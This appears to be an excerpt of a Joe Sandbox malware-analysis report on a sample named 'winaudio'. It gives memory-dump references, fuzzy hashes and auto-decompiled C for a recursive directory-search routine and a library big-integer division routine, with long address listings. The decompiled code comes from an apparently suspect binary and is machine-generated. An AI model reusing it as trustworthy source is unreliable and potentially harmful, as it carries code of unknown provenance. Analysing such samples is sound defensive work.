                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: +$gfff$gfff
                        • API String ID: 0-3646763964
                        • Opcode ID: c59b8538d3c71cd5f1adab68b877c96790a0025e9c913ce8b6aa6da68ca86daf
                        • Instruction ID: 87559773c9e2bc1a9d5672ae956d09a06599adcd2d68e701d5ddc98492638681
                        • Opcode Fuzzy Hash: c59b8538d3c71cd5f1adab68b877c96790a0025e9c913ce8b6aa6da68ca86daf
                        • Instruction Fuzzy Hash: 9FC1A3719187069FD716DF39884473BFAE5EFC8784F048A3DFA99A6211E331C9128B52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038F8BD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                        Download Yara Rule
                        C-Code - Quality: 56%
                        			E0038F8BD(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				char _v288;
				void _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __esi;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				signed int _t104;
				union _FINDEX_INFO_LEVELS _t105;
				void* _t109;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				void* _t113;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t121;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t104 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t104) {
					_push(__ebx);
					_t5 = _t104 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t110 = E0038B987(_t85, _t78, 1);
					_t87 = _t109;
					__eflags = _t104;
					if(_t104 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t104;
						_t40 = E0038F402(_t87, _t110 + _t104, _t78, _a4);
						_t119 = _t118 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0038FAFC(_a16, _t101, __eflags, _t110);
							E0038B8FF(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t104);
						_t75 = E0038F402(_t87, _t110, _t78, _a8);
						_t119 = _t118 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0037F99E();
							asm("int3");
							_t117 = _t119;
							_t120 = _t119 - 0x150;
							_t43 =  *0x3e1008; // 0x847b54ee
							_v48 = _t43 ^ _t117;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t110);
							_t111 = _v28;
							_push(_t104);
							_v372 = _t111;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E003953F0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t105 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E0037E1A0(_t105,  &_v332, _t105, 0x140);
								_t121 = _t120 + 0xc;
								_t112 = FindFirstFileExA(_t79, _t105,  &_v332, _t105, _t105, _t105);
								_t55 = _v336;
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v288 - 0x2e;
										if(_v288 != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0038F8BD(_t79, _t93, _t105,  &_v288, _t79, _v340);
											_t121 = _t121 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 =  *0x39e1c8(_t112,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t102 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E0038A890(_t79, _t105, _t102 + _t96 * 4, _t65 - _t96, 4, E0038F715);
									}
								} else {
									_push(_t55);
									_t57 = E0038F8BD(_t79, _t90, _t105, _t79, _t105, _t105);
									L26:
									_t105 = _t57;
								}
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									 *0x39e1c0(_t112);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t111);
									E0038F8BD(_t79, _t88, 0, _t79, 0, 0);
								}
							}
							_pop(_t113);
							__eflags = _v12 ^ _t117;
							return E002E056D(_v12 ^ _t117, _t102, _t113);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}



















































                        0x0038f8c2
                        0x0038f8c3
                        0x0038f8c6
                        0x0038f8c6
                        0x0038f8c9
                        0x0038f8c9
                        0x0038f8cb
                        0x0038f8cc
                        0x0038f8d5
                        0x0038f8d6
                        0x0038f8d9
                        0x0038f8dc
                        0x0038f8e1
                        0x0038f8e8
                        0x0038f8ea
                        0x0038f8ed
                        0x0038f8f7
                        0x0038f8fa
                        0x0038f8fb
                        0x0038f8fd
                        0x0038f911
                        0x0038f911
                        0x0038f914
                        0x0038f91e
                        0x0038f923
                        0x0038f926
                        0x0038f928
                        0x00000000
                        0x0038f92a
                        0x0038f92e
                        0x0038f937
                        0x0038f93d
                        0x00000000
                        0x0038f940
                        0x0038f8ff
                        0x0038f8ff
                        0x0038f905
                        0x0038f90a
                        0x0038f90d
                        0x0038f90f
                        0x0038f946
                        0x0038f948
                        0x0038f949
                        0x0038f94a
                        0x0038f94b
                        0x0038f94c
                        0x0038f94d
                        0x0038f952
                        0x0038f956
                        0x0038f958
                        0x0038f95e
                        0x0038f965
                        0x0038f968
                        0x0038f96b
                        0x0038f96c
                        0x0038f96f
                        0x0038f970
                        0x0038f973
                        0x0038f974
                        0x0038f995
                        0x0038f995
                        0x0038f997
                        0x00000000
                        0x00000000
                        0x0038f97c
                        0x0038f97e
                        0x0038f980
                        0x0038f982
                        0x0038f984
                        0x0038f986
                        0x0038f988
                        0x0038f993
                        0x00000000
                        0x0038f993
                        0x0038f988
                        0x0038f984
                        0x00000000
                        0x0038f980
                        0x0038f999
                        0x0038f99b
                        0x0038f99e
                        0x0038f9b7
                        0x0038f9b7
                        0x0038f9b9
                        0x0038f9bc
                        0x0038f9cc
                        0x0038f9ce
                        0x0038f9ce
                        0x0038f9be
                        0x0038f9be
                        0x0038f9c1
                        0x00000000
                        0x0038f9c3
                        0x0038f9c3
                        0x0038f9c6
                        0x00000000
                        0x0038f9c8
                        0x0038f9c8
                        0x0038f9c8
                        0x0038f9c6
                        0x0038f9c1
                        0x0038f9d4
                        0x0038f9dc
                        0x0038f9e0
                        0x0038f9ee
                        0x0038f9f3
                        0x0038fa08
                        0x0038fa0a
                        0x0038fa10
                        0x0038fa13
                        0x0038fa45
                        0x0038fa45
                        0x0038fa47
                        0x0038fa4a
                        0x0038fa50
                        0x0038fa50
                        0x0038fa57
                        0x0038fa71
                        0x0038fa71
                        0x0038fa80
                        0x0038fa85
                        0x0038fa88
                        0x0038fa8a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038fa59
                        0x0038fa59
                        0x0038fa5f
                        0x0038fa61
                        0x00000000
                        0x0038fa63
                        0x0038fa63
                        0x0038fa66
                        0x00000000
                        0x0038fa68
                        0x0038fa68
                        0x0038fa6f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038fa6f
                        0x0038fa66
                        0x0038fa61
                        0x00000000
                        0x0038fa8c
                        0x0038fa94
                        0x0038fa9a
                        0x0038fa9c
                        0x0038fa9c
                        0x0038faa4
                        0x0038faa9
                        0x0038fab1
                        0x0038fab4
                        0x0038fab6
                        0x0038faca
                        0x0038facf
                        0x0038fa15
                        0x0038fa15
                        0x0038fa19
                        0x0038fa21
                        0x0038fa21
                        0x0038fa21
                        0x0038fa23
                        0x0038fa26
                        0x0038fa29
                        0x0038fa29
                        0x0038f9a0
                        0x0038f9a3
                        0x0038f9a5
                        0x00000000
                        0x0038f9a7
                        0x0038f9a7
                        0x0038f9ad
                        0x0038f9b2
                        0x0038f9a5
                        0x0038fa35
                        0x0038fa36
                        0x0038fa41
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038f90f
                        0x0038f8e3
                        0x0038f8e5
                        0x0038f941
                        0x0038f945
                        0x0038f945
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: .
                        • API String ID: 0-248832578
                        • Opcode ID: 8ca4f96d0443fe3bc52f6fc3fc1909cf086946246df350f5304397484526b0be
                        • Instruction ID: 8ea74cfd999ea03f3806c5f4d6c60f876472b54ec65d5f15513e82740b96d97f
                        • Opcode Fuzzy Hash: 8ca4f96d0443fe3bc52f6fc3fc1909cf086946246df350f5304397484526b0be
                        • Instruction Fuzzy Hash: 0A31F2729002497FCB26AE78CC85EFA7BADEB85314F0101E9E458D7291E6319E448B50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00389180 Relevance: 3.0, Strings: 2, Instructions: 464COMMONLIBRARYCODECrypto
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E00389180(signed int* _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t243;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				intOrPtr _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t2 =  &_a8; // 0x395163
					_t328 =  *_t2;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t52 =  &_a8; // 0x395163
									_t369 =  *_t52;
									_t243 = _t269 - _t306;
									__eflags =  *((intOrPtr*)(_t369 + 4 + _t243 * 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + 4 + _t243 * 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t60 =  &_a8; // 0x395163
									_t200 =  *_t60;
									_t351 =  *(_t200 + _t330 * 4);
									_t201 =  *((intOrPtr*)(_t200 + _t330 * 4 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t76 =  &_a8; // 0x395163
											_t81 =  &_v36;
											 *_t81 = _v36 |  *( *_t76 + _t330 * 4 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											_t95 =  &_v16; // 0x395163
											__eflags = _t206 -  *_t95;
											if(_t206 >  *_t95) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E003981D0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00397C70(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00397E20(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00397E20(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t144 =  &_a8; // 0x395163
													_t266 = _v20;
													_t219 =  *_t144 + 4;
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t170 =  &_a8; // 0x395163
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  *_t170 + 4;
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t362 = _t362 + 4;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t190 =  &_v16; // 0x395163
									_t309 =  *_t190 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t274 =  &(_t262[_t204 + 1]);
										do {
											 *_t274 = 0;
											_t274 =  &(_t274[1]);
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t295 = _t328[1];
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t25 =  &_v16; // 0x395163
										_t250 =  *_t25 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00397C70( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0039034E(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0039034E(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0039034E(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}
























































































                        0x0038918c
                        0x0038918f
                        0x00389193
                        0x0038919d
                        0x0038919d
                        0x003891a0
                        0x003891a2
                        0x003891a4
                        0x003891b1
                        0x003891b1
                        0x003891b4
                        0x003891b4
                        0x003891b7
                        0x003891ba
                        0x003891bc
                        0x003892ef
                        0x003892f1
                        0x0038933a
                        0x0038933e
                        0x00389344
                        0x003892f3
                        0x003892f5
                        0x003892f8
                        0x003892fa
                        0x003892fd
                        0x003892ff
                        0x00389301
                        0x00389335
                        0x00389335
                        0x00389335
                        0x00389303
                        0x00389308
                        0x0038930e
                        0x0038930e
                        0x00389311
                        0x00389313
                        0x00389315
                        0x00000000
                        0x00000000
                        0x00389317
                        0x00389318
                        0x0038931b
                        0x0038931e
                        0x00389320
                        0x00000000
                        0x00389322
                        0x00000000
                        0x00389322
                        0x00000000
                        0x00389320
                        0x00389324
                        0x00389324
                        0x00389329
                        0x0038932f
                        0x00389333
                        0x00000000
                        0x00000000
                        0x00389333
                        0x00389336
                        0x00389336
                        0x00389338
                        0x00389345
                        0x00389348
                        0x00389348
                        0x0038934b
                        0x0038934e
                        0x00389352
                        0x00389355
                        0x00389358
                        0x0038935b
                        0x00389366
                        0x0038935d
                        0x00389362
                        0x00389362
                        0x00389370
                        0x00389375
                        0x00389378
                        0x0038937a
                        0x00389384
                        0x00389387
                        0x0038938e
                        0x00389391
                        0x00389394
                        0x00389396
                        0x003893a2
                        0x003893a2
                        0x003893a2
                        0x003893a2
                        0x00389394
                        0x003893a7
                        0x003893ae
                        0x003893ae
                        0x003893b1
                        0x003893b4
                        0x003895e6
                        0x003895e6
                        0x003893ba
                        0x003893ba
                        0x003893c0
                        0x003893c3
                        0x003893c6
                        0x003893c9
                        0x003893cc
                        0x003893cf
                        0x003893d2
                        0x003893d2
                        0x003893d2
                        0x003893d5
                        0x003893dc
                        0x003893dc
                        0x003893d7
                        0x003893d7
                        0x003893d7
                        0x003893de
                        0x003893e2
                        0x003893e5
                        0x003893e7
                        0x003893ea
                        0x003893f1
                        0x003893f4
                        0x003893f7
                        0x00389402
                        0x00389405
                        0x0038940a
                        0x0038940f
                        0x00389416
                        0x0038941b
                        0x0038941d
                        0x0038941f
                        0x00389423
                        0x00389426
                        0x00389429
                        0x00389431
                        0x0038943a
                        0x0038943a
                        0x0038943c
                        0x0038943f
                        0x0038943f
                        0x00389429
                        0x00389449
                        0x0038944e
                        0x00389453
                        0x00389455
                        0x00389458
                        0x0038945a
                        0x0038945d
                        0x00389460
                        0x00389462
                        0x00389465
                        0x00389468
                        0x0038946a
                        0x00389471
                        0x00389476
                        0x00389479
                        0x00389483
                        0x00389485
                        0x00389487
                        0x0038948a
                        0x0038948a
                        0x0038948c
                        0x0038948f
                        0x00389492
                        0x00389495
                        0x00389498
                        0x0038946c
                        0x0038946c
                        0x0038946f
                        0x00000000
                        0x00000000
                        0x0038946f
                        0x0038949b
                        0x0038949d
                        0x0038949f
                        0x00000000
                        0x003894a1
                        0x003894a1
                        0x003894a4
                        0x003894a6
                        0x003894a6
                        0x003894b4
                        0x003894b7
                        0x003894bc
                        0x003894be
                        0x00000000
                        0x00000000
                        0x003894c0
                        0x003894c7
                        0x003894c7
                        0x003894ca
                        0x003894cd
                        0x003894d0
                        0x003894d3
                        0x003894d3
                        0x003894d6
                        0x003894d9
                        0x003894dd
                        0x003894e0
                        0x003894e2
                        0x003894e5
                        0x00000000
                        0x00000000
                        0x003894e7
                        0x003894e5
                        0x003894c2
                        0x003894c2
                        0x003894c5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003894c5
                        0x003894ec
                        0x003894ec
                        0x00000000
                        0x003894ec
                        0x003894e9
                        0x00000000
                        0x003894e9
                        0x003894a4
                        0x0038949f
                        0x003894ef
                        0x003894ef
                        0x003894f1
                        0x003894fb
                        0x003894fb
                        0x003894fe
                        0x00389500
                        0x00389502
                        0x00389504
                        0x00389506
                        0x00389509
                        0x0038950c
                        0x0038950c
                        0x0038950f
                        0x00389512
                        0x00389515
                        0x00389517
                        0x0038952c
                        0x0038952e
                        0x00389530
                        0x00389532
                        0x00389534
                        0x00389536
                        0x00389538
                        0x0038953a
                        0x0038953d
                        0x0038953d
                        0x00389541
                        0x00389543
                        0x00389549
                        0x0038954c
                        0x0038954c
                        0x0038954c
                        0x00389550
                        0x00389550
                        0x00389555
                        0x00389558
                        0x00389558
                        0x0038955d
                        0x0038955f
                        0x00389561
                        0x00389568
                        0x00389568
                        0x0038956a
                        0x0038956c
                        0x0038956f
                        0x00389571
                        0x00389574
                        0x00389574
                        0x00389577
                        0x00389580
                        0x00389580
                        0x00389582
                        0x00389587
                        0x0038958d
                        0x00389591
                        0x00389594
                        0x00389597
                        0x00389599
                        0x00389599
                        0x00389599
                        0x0038959e
                        0x0038959e
                        0x003895a1
                        0x003895a4
                        0x00389563
                        0x00389563
                        0x00389566
                        0x00000000
                        0x00000000
                        0x00389566
                        0x00389561
                        0x003895ab
                        0x003895ab
                        0x003895ac
                        0x003894f3
                        0x003894f3
                        0x003894f5
